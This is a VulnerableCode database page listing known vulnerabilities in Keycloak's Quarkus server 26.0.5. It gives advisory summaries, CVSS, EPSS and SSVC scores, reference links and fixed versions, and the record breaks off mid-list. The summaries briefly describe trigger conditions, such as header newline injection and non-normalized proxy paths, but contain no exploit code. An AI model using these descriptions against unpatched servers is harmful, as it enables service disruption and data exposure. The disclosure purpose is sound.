Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:maven/org.keycloak/keycloak-quarkus-server@26.0.5
Typemaven
Namespaceorg.keycloak
Namekeycloak-quarkus-server
Version26.0.5
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version26.5.6
Latest_non_vulnerable_version26.5.6
Affected_by_vulnerabilities
0
url VCID-13cd-jace-rfdu
vulnerability_id VCID-13cd-jace-rfdu
summary 
Denial of Service in Keycloak Server via Security Headers
A potential Denial of Service (DoS) vulnerability has been identified in Keycloak, which could allow an administrative user with the rights to change realm settings to disrupt the service. This is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that is already terminated, leading to a failure of said request.

Service disruption may happen, users will be unable to access applications relying on Keycloak, or any of the consoles provided by Keycloak itself on the affected realm.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:0299
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://access.redhat.com/errata/RHSA-2025:0299
1
reference_url https://access.redhat.com/errata/RHSA-2025:0300
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://access.redhat.com/errata/RHSA-2025:0300
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11734.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11734.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-11734
reference_id
reference_type
scores
0
value 0.00048
scoring_system epss
scoring_elements 0.15367
published_at 2026-06-09T12:55:00Z
1
value 0.00048
scoring_system epss
scoring_elements 0.15474
published_at 2026-06-05T12:55:00Z
2
value 0.00048
scoring_system epss
scoring_elements 0.15465
published_at 2026-06-06T12:55:00Z
3
value 0.00048
scoring_system epss
scoring_elements 0.15424
published_at 2026-06-07T12:55:00Z
4
value 0.00048
scoring_system epss
scoring_elements 0.1534
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-11734
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2328846
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2328846
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://github.com/keycloak/keycloak/commit/93b2a7327b2557eb132a8169086c5e63c81dff79
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/93b2a7327b2557eb132a8169086c5e63c81dff79
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
reference_id cpe:/a:redhat:build_keycloak:26.0
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
11
reference_url https://access.redhat.com/security/cve/CVE-2024-11734
reference_id CVE-2024-11734
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://access.redhat.com/security/cve/CVE-2024-11734
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-11734
reference_id CVE-2024-11734
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-11734
13
reference_url https://github.com/advisories/GHSA-w3g8-r9gw-qrh8
reference_id GHSA-w3g8-r9gw-qrh8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w3g8-r9gw-qrh8
14
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-w3g8-r9gw-qrh8
reference_id GHSA-w3g8-r9gw-qrh8
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-w3g8-r9gw-qrh8
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-cax3-qsfb-yfc9
2
vulnerability VCID-vtut-sg7s-xqf4
3
vulnerability VCID-wgaj-esqz-27fk
4
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
aliases CVE-2024-11734, GHSA-w3g8-r9gw-qrh8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-13cd-jace-rfdu
1
url VCID-4hfv-fbdp-37gr
vulnerability_id VCID-4hfv-fbdp-37gr
summary 
Duplicate Advisory: Keycloak vulnerable to Cleartext Transmission of Sensitive Information
# Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-g6qq-c9f9-2772. This link is maintained to preserve external references.

# Original Description
A vulnerability was found in Keycloak. The environment option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the JGroups replication configuration is always used in plain text which can allow an attacker that has access to adjacent networks related to JGroups to read sensitive information.
references
0
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
1
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
2
reference_url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
3
reference_url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
4
reference_url https://github.com/keycloak/keycloak/issues/28750
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/28750
5
reference_url https://github.com/keycloak/keycloak/issues/34644
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/34644
6
reference_url https://github.com/keycloak/keycloak/pull/28756
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/28756
7
reference_url https://github.com/keycloak/keycloak/pull/34668
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/34668
8
reference_url https://access.redhat.com/security/cve/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-10973
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
10
reference_url https://github.com/advisories/GHSA-6mpx-pmgp-ww49
reference_id GHSA-6mpx-pmgp-ww49
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6mpx-pmgp-ww49
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-6mpx-pmgp-ww49
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4hfv-fbdp-37gr
2
url VCID-7drn-skjh-xkga
vulnerability_id VCID-7drn-skjh-xkga
summary 
Duplicate Advisory: Keycloak Build Process Exposes Sensitive Data
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v7gv-xpgf-6395. This link is maintained to preserve external references.

## Original Description
A flaw was found in Keycloak. This issue occurs because sensitive runtime values, such as passwords, may be captured during the Keycloak build process and embedded as default values in bytecode, leading to unintended information disclosure. In Keycloak 26, sensitive data specified directly in environment variables during the build process is also stored as a default values, making it accessible during runtime. Indirect usage of environment variables for SPI options and Quarkus properties is also vulnerable due to unconditional expansion by PropertyMapper logic, capturing sensitive data as default values in all Keycloak versions up to 26.0.2.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
5
reference_url https://access.redhat.com/security/cve/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-10451
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
7
reference_url https://github.com/advisories/GHSA-jcgg-mg9g-p9wf
reference_id GHSA-jcgg-mg9g-p9wf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jcgg-mg9g-p9wf
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-jcgg-mg9g-p9wf
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7drn-skjh-xkga
3
url VCID-a1me-1k15-2kdt
vulnerability_id VCID-a1me-1k15-2kdt
summary 
Keycloak unable to restrict access to the admin console
A flaw was found in Keycloak. The Keycloak guides recommend to not expose /admin path to the outside in case the installation is using a proxy. The issue occurs at least via ha-proxy, as it can be tricked to using relative/non-normalized paths to access the /admin application path relative to /realms which is expected to be exposed.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:21370
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://access.redhat.com/errata/RHSA-2025:21370
1
reference_url https://access.redhat.com/errata/RHSA-2025:21371
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://access.redhat.com/errata/RHSA-2025:21371
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-10939.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-10939.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-10939
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02298
published_at 2026-06-09T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.0241
published_at 2026-06-05T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02406
published_at 2026-06-06T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02354
published_at 2026-06-07T12:55:00Z
4
value 0.00013
scoring_system epss
scoring_elements 0.0234
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-10939
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
reference_id cpe:/a:redhat:build_keycloak:26.4::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
7
reference_url https://access.redhat.com/security/cve/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://access.redhat.com/security/cve/CVE-2025-10939
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
9
reference_url https://github.com/advisories/GHSA-vjr8-56p3-fmqq
reference_id GHSA-vjr8-56p3-fmqq
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vjr8-56p3-fmqq
10
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-vjr8-56p3-fmqq
reference_id GHSA-vjr8-56p3-fmqq
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-vjr8-56p3-fmqq
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.4
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-wgaj-esqz-27fk
1
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.4
aliases CVE-2025-10939, GHSA-vjr8-56p3-fmqq
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-a1me-1k15-2kdt
4
url VCID-azrr-bwad-97cs
vulnerability_id VCID-azrr-bwad-97cs
summary 
Keycloak proxy header handling Denial-of-Service (DoS) vulnerability
Keycloak versions 26 and earlier are vulnerable to a denial-of-service (DoS) attack through improper handling of proxy headers. When Keycloak is configured to accept incoming proxy headers, it may accept non-IP values, such as obfuscated identifiers, without proper validation. This can lead to costly DNS resolution operations, which an attacker could exploit to tie up IO threads and potentially cause a denial of service.

The attacker must have access to send requests to a Keycloak instance that is configured to accept proxy headers, specifically when reverse proxies do not overwrite incoming headers, and Keycloak is configured to trust these headers.

For Keycloak version 26, for successful exploitation includes: the realm must have SslRequired=EXTERNAL (the default), HTTP must be enabled, the instance must not be using a full hostname URL, access must come from behind a proxy (assuming the proxy overwrites the X-Forwarded-For header), and trusted proxies must not be set or must incorrectly trust the client from which the request is originating.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-9666.json
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-9666.json
5
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-9666
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02893
published_at 2026-06-06T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.0284
published_at 2026-06-07T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02825
published_at 2026-06-08T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.02791
published_at 2026-06-09T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02886
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-9666
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
7
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
8
reference_url https://github.com/keycloak/keycloak/issues/35216
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/35216
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
reference_id cpe:/a:redhat:build_keycloak:24
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
reference_id cpe:/a:redhat:build_keycloak:24::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
reference_id cpe:/a:redhat:build_keycloak:26
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
